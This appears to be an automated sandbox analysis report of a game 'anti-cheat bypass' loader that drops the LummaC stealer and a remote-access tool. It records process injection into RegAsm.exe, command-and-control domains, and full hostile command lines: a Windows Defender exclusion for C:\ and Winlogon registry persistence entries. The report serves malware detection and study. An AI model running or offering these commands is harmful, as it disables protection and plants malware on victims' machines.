Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597813
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597688
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597578
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597469
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597344
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597223
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597032
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 596157
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 595969
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 595719
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 595422
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 595282
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 595090
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 594946
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 594672
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 594391
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 594188
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 593703
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 593485
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 592969
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 592750
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 592453
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 592250
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 592032
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 591657
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 591358
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 591063
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 590907
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 590516
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 590157
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 589953
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 589688
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 589469
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 589000
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 588719
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 588266
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 588078
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587782
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587607
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587497
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587375
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587266
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587155

Source: RegAsm.exe, 0000000D.00000002.1946222478.000000000149B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1946222478.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Bypass.exe, 0000000F.00000002.4223150411.000000001BB8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00436530 LdrInitializeThunk,

13_2_00436530

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Code function: 0_2_00007FF7161476D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7161476D8

Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009DAD74 mov eax, dword ptr fs:[00000030h]		12_2_009DAD74
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009D52A4 mov ecx, dword ptr fs:[00000030h]		12_2_009D52A4

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Code function: 0_2_00007FF716150D20 GetProcessHeap,

0_2_00007FF716150D20

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF7161476D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7161476D8
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716143354 SetUnhandledExceptionFilter,	0_2_00007FF716143354
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716142510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF716142510
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716143170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF716143170
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D3576D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF64D3576D8
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D353170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF64D353170
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D352510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF64D352510
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D353354 SetUnhandledExceptionFilter,	11_2_00007FF64D353354
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009C75F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_009C75F4
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009C7823 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_009C7823
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009C79B0 SetUnhandledExceptionFilter,	12_2_009C79B0
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009D3947 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_009D3947

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\'			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe

Code function: 12_2_00EA018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

12_2_00EA018D

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Loader.exe	String found in binary or memory: doughtdrillyksow.shop
Source: Loader.exe	String found in binary or memory: facilitycoursedw.shop
Source: Loader.exe	String found in binary or memory: bargainnygroandjwk.shop
Source: Loader.exe	String found in binary or memory: disappointcredisotw.shop
Source: Loader.exe	String found in binary or memory: leafcalfconflcitw.shop
Source: Loader.exe	String found in binary or memory: injurypiggyoewirog.shop
Source: Loader.exe	String found in binary or memory: publicitycharetew.shop
Source: Loader.exe	String found in binary or memory: computerexcudesp.shop
Source: Loader.exe	String found in binary or memory: backcreammykiel.shop

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1116008	Jump to behavior

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Code function: 0_2_00007FF71613B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF71613B190

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /c y /n /t 10 /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WINDOWS\system32\explorer.exe, C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Process created: C:\ProgramData\SoftwareDistribution\Bypass.exe "C:\ProgramData\SoftwareDistribution\Bypass.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005BC7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"921702","UserName":"user","IpInfo":{"ip":"Unknown","hostname":"Unknown","city":"Unknown","region":"Unknown","country":"XX","loc":"Unknown","org":"Unknown","postal":"Unknown","timezone":"Unknown"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"M8H3FDED (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5} L
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"921702","UserName":"user","IpInfo":{"ip":"Unknown","hostname":"Unknown","city":"Unknown","region":"Unknown","country":"XX","loc":"Unknown","org":"Unknown","postal":"Unknown","timezone":"Unknown"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"M8H3FDED (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"M8H3FDED (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"S
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"921702","UserName":"user","IpInfo":{"ip":"Unknown","hostname":"Unknown","city":"Unknown","region":"Unknown","country":"XX","loc":"Unknown","org":"Unknown","postal":"Unknown","timezone":"Unknown"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"M8H3FDED (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Code function: 0_2_00007FF7161558E0 cpuid

0_2_00007FF7161558E0

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	0_2_00007FF71613A2CC
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	11_2_00007FF64D34A2CC
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: EnumSystemLocalesW,	12_2_009E2091
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_009E211C
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: GetLocaleInfoW,	12_2_009E236F
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_009E2498
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: GetLocaleInfoW,	12_2_009E259E
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_009E266D
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: EnumSystemLocalesW,	12_2_009D95F3
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: GetLocaleInfoW,	12_2_009D9ABC
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	12_2_009E1D09
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: EnumSystemLocalesW,	12_2_009E1FAB
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: EnumSystemLocalesW,	12_2_009E1FF6
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: GetLocaleInfoW,	12_2_009E1F04

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Queries volume information: C:\ProgramData\SoftwareDistribution\Bypass.exe VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Code function: 0_2_00007FF716140754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF716140754

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Code function: 0_2_00007FF7161251A4 GetVersionExW,

0_2_00007FF7161251A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Users\All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
